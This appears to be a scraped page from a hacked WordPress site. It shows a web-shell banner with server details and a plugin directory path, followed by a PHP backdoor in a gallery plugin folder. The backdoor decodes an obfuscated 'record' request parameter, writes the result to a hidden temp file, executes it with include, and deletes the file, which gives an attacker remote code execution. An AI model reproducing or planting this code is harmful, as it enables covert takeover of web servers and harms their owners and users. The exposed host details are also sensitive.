| Server IP : 145.239.37.162 / Your IP : 216.73.217.81 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/v/e/r/verseaa/www/wp-content/plugins/gallery-1786049548/ |
Upload File : |
<!--BmGiyP5U-->
<?php
if(in_array("rec\x6F\x72d", array_keys($_REQUEST))){
$data = $_REQUEST["rec\x6F\x72d"];
$data = explode ( "." , $data ) ;
$parameter_group = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt);
$i = 0;
$__tmp = $data;
while ($val = array_shift($__tmp)) {
$sChar = ord($salt[$i % $lenS]);
$dec = ((int)$val - $sChar - ($i % 10)) ^ 82;
$parameter_group .= chr($dec);
$i++;
}
$tkn = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", getenv("TEMP")]);
while ($flag = array_shift($tkn)) {
if (!( !is_dir($flag) || !is_writable($flag) )) {
$dat = "$flag" . "/.elem";
if ($bind = fopen($dat, 'w')) {
fwrite($bind, $parameter_group);
fclose($bind);
include $dat;
unlink($dat);
exit;
}
}
}
}